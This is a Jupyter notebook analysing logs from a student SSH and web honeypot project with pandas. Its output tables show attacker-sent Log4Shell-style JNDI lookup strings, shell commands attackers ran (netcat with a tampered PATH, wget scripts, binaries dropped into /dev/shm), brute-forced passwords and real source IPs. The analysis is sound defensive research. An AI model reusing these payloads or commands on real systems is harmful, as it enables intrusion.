<a href="https://colab.research.google.com/github/friendly-besties-incorporated/all-honeypot-code/blob/main/hacs200master.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>

# Import data

In [1]:
import pandas as pd
import numpy as np
import datetime as dt
from datetime import datetime
from pathlib import Path
import requests

mitm_out.txt, apache_out.txt, cmds_out.txt is the raw data! You can find it in the group drive.

tcpdump_output.csv is a csv (the excel).

You will need to drag and drop those into your current session (see folder icon on left sidebar).

In [2]:
mitm = pd.read_csv('mitm_out.txt', lineterminator='\n', delimiter='|')
mitm.set_axis(['containerType', 'IP', 'Time', 'attackerUser', 'attackerPwd', 'numCMDS', 'noninteractive'], axis=1, inplace=True)
mitm

,containerType,IP,Time,attackerUser,attackerPwd,numCMDS,noninteractive
0,pwd-t_running,173.18.35.41,2022-10-24 06:29:53.320,git,12345qwert,1,y
1,pwd-t_running,191.242.188.103,2022-10-23 17:47:57.987,git,12345qwert,1,y
2,pwd-t_running,209.216.177.158,2022-10-24 04:23:02.961,git,12345qwert,1,y
3,pwd-t_running,31.165.5.151,2022-10-23 11:36:31.614,git,12345qwert,1,y
4,pwd-t_running,91.125.119.231,2022-10-23 21:35:27.480,git,12345qwert,1,y
...,...,...,...,...,...,...,...
45668,pwd-t-2_running,84.6.79.211,2022-10-30 23:14:07.893,root,1,1,y
45669,pwd-t-2_running,73.42.244.8,2022-10-31 01:25:47.965,root,1,1,y
45670,pwd-t-2_running,145.40.73.79,2022-10-30 12:49:09.289,root,1,1,y
45671,pwd-t-2_running,124.221.181.83,2022-10-30 12:53:25.129,root,1,1,y


In [3]:
apache = pd.read_csv('apache_out.txt', lineterminator='\n', delimiter='|')
apache.set_axis(['containerType', 'IP', 'Time', 'Type', 'SMTH', 'userAgent', 'noninteractive'], axis=1, inplace=True)
apache

,containerType,IP,Time,Type,SMTH,userAgent,noninteractive
0,pwd-t_running,65.154.226.109,20/Oct/2022:08:41:50,GET /resources/images/dis_logo.png HTTP/1.1,http://128.8.238.49/resources/css/footer.css,Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/5...,y
1,pwd-t_running,167.94.138.119,21/Oct/2022:03:31:45,GET /favicon.ico HTTP/1.1,-,Mozilla/5.0 (compatible; CensysInspect/1.1; +...,y
2,pwd-t_running,45.61.185.198,20/Oct/2022:12:37:53,GET /config/getuser?index=0 HTTP/1.1,-,Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76...,y
3,pwd-t_running,181.214.218.69,20/Oct/2022:13:04:48,GET / HTTP/1.1,-,Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537....,y
4,pwd-t_running,165.22.227.186,20/Oct/2022:13:34:30,\x16\x03\x01,-,-,n
...,...,...,...,...,...,...,...
3313,pwd-t-2_running,89.100.220.200,29/Oct/2022:10:58:32,GET / HTTP/1.1,${jndi:ldap://:8181/a},${jndi:ldap://:8181/a},y
3314,pwd-t-2_running,162.19.210.221,29/Oct/2022:13:44:17,GET / HTTP/1.1,${jndi:ldap://:8181/a},${jndi:ldap://:8181/a},y
3315,pwd-t-2_running,47.108.86.76,28/Oct/2022:15:30:53,GET / HTTP/1.1,${jndi:ldap://:8185/a},${jndi:ldap://:8185/a},y
3316,pwd-t-2_running,223.171.91.174,29/Oct/2022:01:23:21,GET / HTTP/1.1,${jndi:ldap://:8183/a},${jndi:ldap://:8183/a},y


In [4]:
cmds = pd.read_csv('cmds_out.txt', lineterminator='\n', delimiter='|')
cmds.set_axis(['containerType', 'IP', 'Time', 'attackerUser', 'attackerPwd', 'noninteractive', 'command'], axis=1, inplace=True)
cmds

,containerType,IP,Time,attackerUser,attackerPwd,noninteractive,command
0,pwd-t_running,173.18.35.41,2022-10-24 06:29:53.320,git,12345qwert,y,PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc...
1,pwd-t_running,191.242.188.103,2022-10-23 17:47:57.987,git,12345qwert,y,PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc...
2,pwd-t_running,209.216.177.158,2022-10-24 04:23:02.961,git,12345qwert,y,PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc...
3,pwd-t_running,31.165.5.151,2022-10-23 11:36:31.614,git,12345qwert,y,PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc...
4,pwd-t_running,91.125.119.231,2022-10-23 21:35:27.480,git,12345qwert,y,PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc...
...,...,...,...,...,...,...,...
45687,pwd-t-2_running,84.6.79.211,2022-10-30 23:14:07.893,root,1,y,PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc...
45688,pwd-t-2_running,73.42.244.8,2022-10-31 01:25:47.965,root,1,y,PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc...
45689,pwd-t-2_running,145.40.73.79,2022-10-30 12:49:09.289,root,1,y,PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc...
45690,pwd-t-2_running,124.221.181.83,2022-10-30 12:53:25.129,root,1,y,PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc...


In [5]:
tcp = pd.read_csv('tcpdump_output.csv', lineterminator='\n', delimiter=',')
tcp.set_axis(['index', 'IP', 'Time', 'containerType'], axis=1, inplace=True)
tcp = tcp.drop(columns='index')
tcp

,IP,Time,containerType
0,175.107.13.124,1.666306e+09,pwd-t
1,175.107.13.124,1.666306e+09,pwd-t
2,175.107.13.124,1.666306e+09,pwd-t
3,175.107.13.124,1.666306e+09,pwd-t
4,175.107.13.124,1.666306e+09,pwd-t
...,...,...,...
273296,45.139.105.208,1.666551e+09,pwd-t-2
273297,45.139.105.208,1.666551e+09,pwd-t-2
273298,45.139.105.208,1.666551e+09,pwd-t-2
273299,45.139.105.208,1.666551e+09,pwd-t-2


In [6]:
# Convert IPs to strings because strings
mitm["IP"] = mitm["IP"].astype("string")
cmds["IP"] = cmds["IP"].astype("string")
apache["IP"] = apache["IP"].astype("string")

# maybe delete trailing and leading spaces?
mitm["IP"] = mitm["IP"].replace(r"^ +| +$", r"", regex=True)
cmds["IP"] = cmds["IP"].replace(r"^ +| +$", r"", regex=True)
apache["IP"] = apache["IP"].replace(r"^ +| +$", r"", regex=True)
tcp["IP"] = tcp["IP"].astype("string")
tcp["IP"] = tcp["IP"].replace(r"^ +| +$", r"", regex=True)

mitm["containerType"] = mitm["containerType"].replace(r"^ +| +$", r"", regex=True)
cmds["containerType"] = cmds["containerType"].replace(r"^ +| +$", r"", regex=True)
apache["containerType"] = apache["containerType"].replace(r"^ +| +$", r"", regex=True)
tcp["containerType"] = tcp["containerType"].replace(r"^ +| +$", r"", regex=True)
tcp['containerType'] = tcp['containerType'].astype(str) + "_running"

In [7]:
mitm['Time'] = pd.to_datetime(mitm['Time'], errors='coerce')
apache['Time'] = apache['Time'].apply(lambda x: dt.datetime.strptime(x, ' %d/%b/%Y:%H:%M:%S '))
cmds['Time'] = pd.to_datetime(cmds['Time'], errors='coerce')
tcp['Time'] = tcp['Time'].apply(lambda x : dt.datetime.utcfromtimestamp(x))

## Functions

In [8]:
def matchApache (df, apache):
  for index, row in apache.iterrows():
    idx = df[(df['containerType'] == row['containerType']) & (df['IP'] == row['IP']) & (df['Time'] >= row['Time'])].index
    df.loc[idx, 'apacheType'] = row['Type']
    df.loc[idx, 'userAgent'] = row['userAgent']
    df.loc[idx, 'apacheTime'] = row['Time']
    df.loc[idx, 'apacheIP'] = row['IP']
    df.loc[idx, 'apacheContainer'] = row['containerType']

In [9]:
def matchTCP (df, tcp):
  for index, row in tcp.iterrows():
    idx = df[(df['containerType'] == row['containerType']) & (df['IP'] == row['IP']) & (df['Time'] >= row['Time'])].index
    df.loc[idx, 'tcpContainer'] = row['containerType']
    df.loc[idx, 'tcpTime'] = row['Time']
    df.loc[idx, 'tcpIP'] = row['IP']

In [10]:
def exportCSV (df, output):
  filepath = Path('/content/' + output + '.csv')  
  df.to_csv(filepath)

In [11]:
def addGeoCol(df, IPColName):
  uniqueIPs = df[IPColName].unique()
  dict = {}
  for x in uniqueIPs:
    dict[x] = requests.get("https://geolocation-db.com/json/" + x + "&position=true").json().get("country_name")
  df['geoLocation'] = df[IPColName].apply(lambda x: dict[x])

# Apache first check (different container types for 1/2)

In [12]:
apacheMatch1 = mitm.loc[(mitm['IP'].isin(apache['IP'])) & (mitm['containerType'].isin(apache['containerType']))]
apacheMatch1 = apacheMatch1.reset_index()
apacheMatch1 = apacheMatch1.drop(columns='index')
apacheMatch1

,containerType,IP,Time,attackerUser,attackerPwd,numCMDS,noninteractive
0,pwd-t_running,173.18.35.41,2022-10-24 06:29:53.320,git,12345qwert,1,y
1,pwd-t_running,191.242.188.103,2022-10-23 17:47:57.987,git,12345qwert,1,y
2,pwd-t_running,31.165.5.151,2022-10-23 11:36:31.614,git,12345qwert,1,y
3,pwd-t_running,91.125.119.231,2022-10-23 21:35:27.480,git,12345qwert,1,y
4,pwd-t_running,84.16.224.173,2022-10-23 21:09:01.608,root,1,1,y
...,...,...,...,...,...,...,...
31371,pwd-t-2_running,84.6.79.211,2022-10-30 23:14:07.893,root,1,1,y
31372,pwd-t-2_running,73.42.244.8,2022-10-31 01:25:47.965,root,1,1,y
31373,pwd-t-2_running,145.40.73.79,2022-10-30 12:49:09.289,root,1,1,y
31374,pwd-t-2_running,124.221.181.83,2022-10-30 12:53:25.129,root,1,1,y


In [13]:
matchApache(apacheMatch1, apache)

## Output

In [14]:
usable1 = apacheMatch1.dropna()
usable1

,containerType,IP,Time,attackerUser,attackerPwd,numCMDS,noninteractive,apacheType,userAgent,apacheTime,apacheIP,apacheContainer
1703,it-t-2_running,173.18.35.41,2022-10-23 01:12:18.451,root,1,1,y,GET / HTTP/1.1,${jndi:ldap://:8180/a},2022-10-22 05:02:27,173.18.35.41,it-t-2_running
1728,it-t-2_running,173.18.35.41,2022-10-24 03:19:26.313,root,1,1,y,GET / HTTP/1.1,${jndi:ldap://:8180/a},2022-10-22 05:02:27,173.18.35.41,it-t-2_running
1742,it-t-2_running,173.18.35.41,2022-10-23 13:15:57.007,root,1,1,y,GET / HTTP/1.1,${jndi:ldap://:8180/a},2022-10-22 05:02:27,173.18.35.41,it-t-2_running
1814,it-t-2_running,173.18.35.41,2022-10-23 07:28:02.403,root,1,1,y,GET / HTTP/1.1,${jndi:ldap://:8180/a},2022-10-22 05:02:27,173.18.35.41,it-t-2_running
1854,it-t-2_running,173.18.35.41,2022-10-23 15:33:54.631,root,1,1,y,GET / HTTP/1.1,${jndi:ldap://:8180/a},2022-10-22 05:02:27,173.18.35.41,it-t-2_running
...,...,...,...,...,...,...,...,...,...,...,...,...
31368,pwd-t-2_running,178.140.136.178,2022-10-31 20:51:45.689,root,1,1,y,GET / HTTP/1.1,${jndi:ldap://:8187/a},2022-10-31 08:01:50,178.140.136.178,pwd-t-2_running
31369,pwd-t-2_running,31.165.5.155,2022-10-29 04:09:53.614,root,1,1,y,GET / HTTP/1.1,${jndi:ldap://:8180/a},2022-10-28 12:39:52,31.165.5.155,pwd-t-2_running
31370,pwd-t-2_running,58.216.8.121,2022-10-30 16:44:43.865,root,1,1,y,GET / HTTP/1.1,${jndi:ldap://:8182/a},2022-10-29 01:56:57,58.216.8.121,pwd-t-2_running
31374,pwd-t-2_running,124.221.181.83,2022-10-30 12:53:25.129,root,1,1,y,GET / HTTP/1.1,${jndi:ldap://:8189/a},2022-10-27 19:51:27,124.221.181.83,pwd-t-2_running


In [15]:
exportCSV(usable1, 'outApache1')

In [16]:
display(pd.unique(usable1['IP']))
display(len(pd.unique(usable1['IP'])))

<StringArray>
[  '173.18.35.41', '223.171.91.176', '223.171.91.163',  '78.187.13.206',
   '40.87.11.253', '89.100.220.200',   '69.236.215.6',  '117.16.44.111',
 '182.224.177.28', '182.224.177.33',
 ...
   '145.40.73.31',   '119.4.109.93', '80.153.159.119',  '174.4.208.151',
 '93.176.229.145',   '47.108.86.76', '103.90.177.102',  '217.85.239.81',
 '223.171.91.127', '120.197.154.22']
Length: 122, dtype: string

122

In [17]:
filteredCMDS1 = cmds[(cmds['IP'].isin(usable1['IP'])) & (cmds['containerType'].isin(usable1['containerType'])) & (cmds['Time'].isin(usable1['Time']))]
filteredCMDS1

,containerType,IP,Time,attackerUser,attackerPwd,noninteractive,command
5030,it-t-2_running,173.18.35.41,2022-10-23 01:12:18.451,root,1,y,PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc...
5047,it-t-2_running,173.18.35.41,2022-10-24 03:19:26.313,root,1,y,PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc...
5063,it-t-2_running,173.18.35.41,2022-10-23 13:15:57.007,root,1,y,PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc...
5133,it-t-2_running,173.18.35.41,2022-10-23 07:28:02.403,root,1,y,PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc...
5170,it-t-2_running,173.18.35.41,2022-10-23 15:33:54.631,root,1,y,PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc...
...,...,...,...,...,...,...,...
45684,pwd-t-2_running,178.140.136.178,2022-10-31 20:51:45.689,root,1,y,PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc...
45685,pwd-t-2_running,31.165.5.155,2022-10-29 04:09:53.614,root,1,y,uname -a
45686,pwd-t-2_running,58.216.8.121,2022-10-30 16:44:43.865,root,1,y,PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc...
45690,pwd-t-2_running,124.221.181.83,2022-10-30 12:53:25.129,root,1,y,PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc...


In [18]:
exportCSV(filteredCMDS1, 'outApacheCMDS1')

# TCP first check (different container types for 1/2)

In [19]:
tcpMatch1 = mitm.loc[(mitm['IP'].isin(tcp['IP'])) & (mitm['containerType'].isin(tcp['containerType']))]
tcpMatch1 = tcpMatch1.reset_index()
tcpMatch1 = tcpMatch1.drop(columns='index')
tcpMatch1

,containerType,IP,Time,attackerUser,attackerPwd,numCMDS,noninteractive
0,pwd-t_running,173.18.35.41,2022-10-24 06:29:53.320,git,12345qwert,1,y
1,pwd-t_running,191.242.188.103,2022-10-23 17:47:57.987,git,12345qwert,1,y
2,pwd-t_running,209.216.177.158,2022-10-24 04:23:02.961,git,12345qwert,1,y
3,pwd-t_running,31.165.5.151,2022-10-23 11:36:31.614,git,12345qwert,1,y
4,pwd-t_running,91.125.119.231,2022-10-23 21:35:27.480,git,12345qwert,1,y
...,...,...,...,...,...,...,...
37274,pwd-t-2_running,84.6.79.211,2022-10-30 23:14:07.893,root,1,1,y
37275,pwd-t-2_running,73.42.244.8,2022-10-31 01:25:47.965,root,1,1,y
37276,pwd-t-2_running,145.40.73.79,2022-10-30 12:49:09.289,root,1,1,y
37277,pwd-t-2_running,124.221.181.83,2022-10-30 12:53:25.129,root,1,1,y


In [20]:
tcpShorter1 = tcp.loc[(tcp['IP'].isin(mitm['IP'])) & (tcp['containerType'].isin(mitm['containerType']))]
tcpShorter1

,IP,Time,containerType
692,180.93.32.58,2022-10-26 19:00:19.082565,pwd-t_running
693,180.93.32.58,2022-10-26 19:00:19.334816,pwd-t_running
694,180.93.32.58,2022-10-26 19:00:19.337175,pwd-t_running
695,180.93.32.58,2022-10-26 19:00:19.337175,pwd-t_running
699,180.93.32.58,2022-10-26 19:04:08.251953,pwd-t_running
...,...,...,...
273212,27.1.44.56,2022-10-23 09:13:39.224025,pwd-t-2_running
273213,27.1.44.56,2022-10-23 09:13:39.224025,pwd-t-2_running
273214,27.1.44.56,2022-10-23 09:13:44.260613,pwd-t-2_running
273215,27.1.44.56,2022-10-23 09:13:59.241195,pwd-t-2_running


In [21]:
matchTCP(tcpMatch1, tcpShorter1)

## Output

In [22]:
usableTCP1 = tcpMatch1.dropna()
usableTCP1

,containerType,IP,Time,attackerUser,attackerPwd,numCMDS,noninteractive,tcpContainer,tcpTime,tcpIP
0,pwd-t_running,173.18.35.41,2022-10-24 06:29:53.320,git,12345qwert,1,y,pwd-t_running,2022-10-24 04:45:04.575609,173.18.35.41
2,pwd-t_running,209.216.177.158,2022-10-24 04:23:02.961,git,12345qwert,1,y,pwd-t_running,2022-10-24 01:43:48.569657,209.216.177.158
5,pwd-t_running,84.16.224.173,2022-10-23 21:09:01.608,root,1,1,y,pwd-t_running,2022-10-23 21:06:56.779690,84.16.224.173
9,pwd-t_running,20.127.87.36,2022-10-24 11:58:17.165,git,12345qwert,1,y,pwd-t_running,2022-10-24 02:03:45.510898,20.127.87.36
11,pwd-t_running,66.70.154.59,2022-10-24 02:54:28.957,git,12345qwert,1,y,pwd-t_running,2022-10-24 02:21:38.041893,66.70.154.59
...,...,...,...,...,...,...,...,...,...,...
37273,pwd-t-2_running,58.216.8.121,2022-10-30 16:44:43.865,root,1,1,y,pwd-t-2_running,2022-10-29 03:47:21.264483,58.216.8.121
37274,pwd-t-2_running,84.6.79.211,2022-10-30 23:14:07.893,root,1,1,y,pwd-t-2_running,2022-10-30 20:16:18.243414,84.6.79.211
37276,pwd-t-2_running,145.40.73.79,2022-10-30 12:49:09.289,root,1,1,y,pwd-t-2_running,2022-10-30 11:28:35.015794,145.40.73.79
37277,pwd-t-2_running,124.221.181.83,2022-10-30 12:53:25.129,root,1,1,y,pwd-t-2_running,2022-10-28 18:43:38.098723,124.221.181.83


In [23]:
exportCSV(usableTCP1, 'outTCP1')

In [24]:
filteredTCPCMDS1 = cmds[(cmds['IP'].isin(usableTCP1['IP'])) & (cmds['containerType'].isin(usableTCP1['containerType'])) & (cmds['Time'].isin(usableTCP1['Time']))]
filteredTCPCMDS1

,containerType,IP,Time,attackerUser,attackerPwd,noninteractive,command
0,pwd-t_running,173.18.35.41,2022-10-24 06:29:53.320,git,12345qwert,y,PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc...
2,pwd-t_running,209.216.177.158,2022-10-24 04:23:02.961,git,12345qwert,y,PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc...
5,pwd-t_running,84.16.224.173,2022-10-23 21:09:01.608,root,1,y,uname -a
10,pwd-t_running,20.127.87.36,2022-10-24 11:58:17.165,git,12345qwert,y,PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc...
11,pwd-t_running,66.70.154.59,2022-10-24 02:54:28.957,git,12345qwert,y,PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc...
...,...,...,...,...,...,...,...
45686,pwd-t-2_running,58.216.8.121,2022-10-30 16:44:43.865,root,1,y,PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc...
45687,pwd-t-2_running,84.6.79.211,2022-10-30 23:14:07.893,root,1,y,PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc...
45689,pwd-t-2_running,145.40.73.79,2022-10-30 12:49:09.289,root,1,y,PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc...
45690,pwd-t-2_running,124.221.181.83,2022-10-30 12:53:25.129,root,1,y,PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc...


In [25]:
exportCSV(filteredTCPCMDS1, 'outTCPCMDS1')

In [26]:
filteredTCPCMDS1.groupby(by='command').count()

,containerType,IP,Time,attackerUser,attackerPwd,noninteractive
command,,,,,,
./666bins x86,1,1,1,1,1,1
./wget.sh server,2,2,2,2,2,2
./x0x524c1e4,1,1,1,1,1,1
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234,8487,8487,8487,8487,8487,8487
cat /etc/issue,1,1,1,1,1,1
cat 666.x86 >666bins,1,1,1,1,1,1
cat > ./ifconfig,7,7,7,7,7,7
cat > /dev/shm/ifconfig,78,78,78,78,78,78
cat > /etc/ifconfig,9,9,9,9,9,9


In [27]:
usableTCP1.groupby(by='IP').count()
usableTCP1.groupby(by='attackerUser').count()
usableTCP1.groupby(by='attackerPwd').count()

,containerType,IP,Time,attackerUser,numCMDS,noninteractive,tcpContainer,tcpTime,tcpIP
attackerPwd,,,,,,,,,
!QAZ@WSX,31,31,31,31,31,31,31,31,31
!qAz@wSx,1,1,1,1,1,1,1,1,1
1,11959,11959,11959,11959,11959,11959,11959,11959,11959
111,6,6,6,6,6,6,6,6,6
111111,1,1,1,1,1,1,1,1,1
123454321,1,1,1,1,1,1,1,1,1
1234567,2,2,2,2,2,2,2,2,2
12345qwert,503,503,503,503,503,503,503,503,503
1234qazwsx,1,1,1,1,1,1,1,1,1


# Apache second check (same container types for 1/2)

consider 1/2 the same container types to see if it affects results

For example, swipe-t_running and swipe-t-2_running are now considered the same type

In [28]:
# cursed code
mitm['containerType'] = mitm['containerType'].str.replace('swipe-t_running','swipe')
mitm['containerType'] = mitm['containerType'].str.replace('swipe-t-2_running','swipe')
mitm['containerType'] = mitm['containerType'].str.replace('it-t_running','it')
mitm['containerType'] = mitm['containerType'].str.replace('it-t-2_running','it')
mitm['containerType'] = mitm['containerType'].str.replace('blank-t_running','blank')
mitm['containerType'] = mitm['containerType'].str.replace('blank-t-2_running','blank')
mitm['containerType'] = mitm['containerType'].str.replace('control-t_running','control')
mitm['containerType'] = mitm['containerType'].str.replace('pwd-t_running','pwd')
mitm['containerType'] = mitm['containerType'].str.replace('pwd-t-2_running','pwd')

apache['containerType'] = apache['containerType'].str.replace('swipe-t_running','swipe')
apache['containerType'] = apache['containerType'].str.replace('swipe-t-2_running','swipe')
apache['containerType'] = apache['containerType'].str.replace('it-t_running','it')
apache['containerType'] = apache['containerType'].str.replace('it-t-2_running','it')
apache['containerType'] = apache['containerType'].str.replace('blank-t_running','blank')
apache['containerType'] = apache['containerType'].str.replace('blank-t-2_running','blank')
apache['containerType'] = apache['containerType'].str.replace('control-t_running','control')
apache['containerType'] = apache['containerType'].str.replace('pwd-t_running','pwd')
apache['containerType'] = apache['containerType'].str.replace('pwd-t-2_running','pwd')

cmds['containerType'] = cmds['containerType'].str.replace('swipe-t_running','swipe')
cmds['containerType'] = cmds['containerType'].str.replace('swipe-t-2_running','swipe')
cmds['containerType'] = cmds['containerType'].str.replace('it-t_running','it')
cmds['containerType'] = cmds['containerType'].str.replace('it-t-2_running','it')
cmds['containerType'] = cmds['containerType'].str.replace('blank-t_running','blank')
cmds['containerType'] = cmds['containerType'].str.replace('blank-t-2_running','blank')
cmds['containerType'] = cmds['containerType'].str.replace('control-t_running','control')
cmds['containerType'] = cmds['containerType'].str.replace('pwd-t_running','pwd')
cmds['containerType'] = cmds['containerType'].str.replace('pwd-t-2_running','pwd')

tcp['containerType'] = tcp['containerType'].str.replace('swipe-t_running','swipe')
tcp['containerType'] = tcp['containerType'].str.replace('swipe-t-2_running','swipe')
tcp['containerType'] = tcp['containerType'].str.replace('it-t_running','it')
tcp['containerType'] = tcp['containerType'].str.replace('it-t-2_running','it')
tcp['containerType'] = tcp['containerType'].str.replace('blank-t_running','blank')
tcp['containerType'] = tcp['containerType'].str.replace('blank-t-2_running','blank')
tcp['containerType'] = tcp['containerType'].str.replace('control-t_running','control')
tcp['containerType'] = tcp['containerType'].str.replace('pwd-t_running','pwd')
tcp['containerType'] = tcp['containerType'].str.replace('pwd-t-2_running','pwd')

In [29]:
apacheMatch2 = mitm.loc[(mitm['IP'].isin(apache['IP'])) & (mitm['containerType'].isin(apache['containerType']))]
apacheMatch2 = apacheMatch2.reset_index()
apacheMatch2 = apacheMatch2.drop(columns='index')
apacheMatch2

,containerType,IP,Time,attackerUser,attackerPwd,numCMDS,noninteractive
0,pwd,173.18.35.41,2022-10-24 06:29:53.320,git,12345qwert,1,y
1,pwd,191.242.188.103,2022-10-23 17:47:57.987,git,12345qwert,1,y
2,pwd,31.165.5.151,2022-10-23 11:36:31.614,git,12345qwert,1,y
3,pwd,91.125.119.231,2022-10-23 21:35:27.480,git,12345qwert,1,y
4,pwd,84.16.224.173,2022-10-23 21:09:01.608,root,1,1,y
...,...,...,...,...,...,...,...
31371,pwd,84.6.79.211,2022-10-30 23:14:07.893,root,1,1,y
31372,pwd,73.42.244.8,2022-10-31 01:25:47.965,root,1,1,y
31373,pwd,145.40.73.79,2022-10-30 12:49:09.289,root,1,1,y
31374,pwd,124.221.181.83,2022-10-30 12:53:25.129,root,1,1,y


In [30]:
matchApache(apacheMatch2, apache)

## Output

In [31]:
usable2 = apacheMatch2.dropna()
usable2

,containerType,IP,Time,attackerUser,attackerPwd,numCMDS,noninteractive,apacheType,userAgent,apacheTime,apacheIP,apacheContainer
1703,it,173.18.35.41,2022-10-23 01:12:18.451,root,1,1,y,GET / HTTP/1.1,${jndi:ldap://:8180/a},2022-10-22 05:02:27,173.18.35.41,it
1728,it,173.18.35.41,2022-10-24 03:19:26.313,root,1,1,y,GET / HTTP/1.1,${jndi:ldap://:8180/a},2022-10-22 05:02:27,173.18.35.41,it
1742,it,173.18.35.41,2022-10-23 13:15:57.007,root,1,1,y,GET / HTTP/1.1,${jndi:ldap://:8180/a},2022-10-22 05:02:27,173.18.35.41,it
1814,it,173.18.35.41,2022-10-23 07:28:02.403,root,1,1,y,GET / HTTP/1.1,${jndi:ldap://:8180/a},2022-10-22 05:02:27,173.18.35.41,it
1854,it,173.18.35.41,2022-10-23 15:33:54.631,root,1,1,y,GET / HTTP/1.1,${jndi:ldap://:8180/a},2022-10-22 05:02:27,173.18.35.41,it
...,...,...,...,...,...,...,...,...,...,...,...,...
31368,pwd,178.140.136.178,2022-10-31 20:51:45.689,root,1,1,y,GET / HTTP/1.1,${jndi:ldap://:8187/a},2022-10-31 08:01:50,178.140.136.178,pwd
31369,pwd,31.165.5.155,2022-10-29 04:09:53.614,root,1,1,y,GET / HTTP/1.1,${jndi:ldap://:8180/a},2022-10-28 12:39:52,31.165.5.155,pwd
31370,pwd,58.216.8.121,2022-10-30 16:44:43.865,root,1,1,y,GET / HTTP/1.1,${jndi:ldap://:8182/a},2022-10-29 01:56:57,58.216.8.121,pwd
31374,pwd,124.221.181.83,2022-10-30 12:53:25.129,root,1,1,y,GET / HTTP/1.1,${jndi:ldap://:8189/a},2022-10-27 19:51:27,124.221.181.83,pwd


In [32]:
exportCSV(usable2, 'outApache2')

In [33]:
display(pd.unique(usable2['IP']))
display(len(pd.unique(usable2['IP'])))
okIPs=usable2['IP']

<StringArray>
[  '173.18.35.41', '120.236.79.182',  '89.121.228.38', '223.171.91.148',
   '1.220.98.197', '223.171.91.182', '222.117.95.174', '147.182.233.56',
 '223.171.91.176',  '195.87.73.176',
 ...
 '80.147.162.151', '120.236.69.162', '193.142.146.35', '80.153.159.119',
 '223.171.91.191', '120.236.78.194',   '145.40.73.31',   '119.4.109.93',
 '103.90.177.102', '120.197.154.22']
Length: 125, dtype: string

125

In [34]:
filteredCMDS2 = cmds[(cmds['IP'].isin(usable2['IP'])) & (cmds['containerType'].isin(usable2['containerType'])) & (cmds['Time'].isin(usable2['Time']))]
filteredCMDS2

,containerType,IP,Time,attackerUser,attackerPwd,noninteractive,command
5030,it,173.18.35.41,2022-10-23 01:12:18.451,root,1,y,PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc...
5047,it,173.18.35.41,2022-10-24 03:19:26.313,root,1,y,PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc...
5063,it,173.18.35.41,2022-10-23 13:15:57.007,root,1,y,PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc...
5133,it,173.18.35.41,2022-10-23 07:28:02.403,root,1,y,PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc...
5170,it,173.18.35.41,2022-10-23 15:33:54.631,root,1,y,PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc...
...,...,...,...,...,...,...,...
45684,pwd,178.140.136.178,2022-10-31 20:51:45.689,root,1,y,PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc...
45685,pwd,31.165.5.155,2022-10-29 04:09:53.614,root,1,y,uname -a
45686,pwd,58.216.8.121,2022-10-30 16:44:43.865,root,1,y,PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc...
45690,pwd,124.221.181.83,2022-10-30 12:53:25.129,root,1,y,PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc...


In [35]:
exportCSV(filteredCMDS2, 'outApacheCMDS2')

In [36]:
filteredCMDS2.groupby(by='command').count()

,containerType,IP,Time,attackerUser,attackerPwd,noninteractive
command,,,,,,
./wget.sh server,1,1,1,1,1,1
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234,4413,4413,4413,4413,4413,4413
cat > ./ifconfig,4,4,4,4,4,4
cat > /dev/shm/ifconfig,40,40,40,40,40,40
cat > /etc/ifconfig,2,2,2,2,2,2
cat > /root/ifconfig,2,2,2,2,2,2
cat > /tmp/ifconfig,4,4,4,4,4,4
cat > /var/tmp/ifconfig,1,1,1,1,1,1
cd /tmp,1,1,1,1,1,1


In [37]:
usable2.groupby(by='IP').count()

,containerType,Time,attackerUser,attackerPwd,numCMDS,noninteractive,apacheType,userAgent,apacheTime,apacheIP,apacheContainer
IP,,,,,,,,,,,
1.220.98.197,73,73,73,73,73,73,73,73,73,73,73
101.35.198.225,47,47,47,47,47,47,47,47,47,47,47
101.35.232.15,20,20,20,20,20,20,20,20,20,20,20
102.141.225.238,55,55,55,55,55,55,55,55,55,55,55
103.105.12.48,65,65,65,65,65,65,65,65,65,65,65
...,...,...,...,...,...,...,...,...,...,...,...
91.125.119.231,10,10,10,10,10,10,10,10,10,10,10
93.103.126.32,75,75,75,75,75,75,75,75,75,75,75
93.176.229.145,26,26,26,26,26,26,26,26,26,26,26


In [38]:
usable2.groupby(by='attackerUser').count()

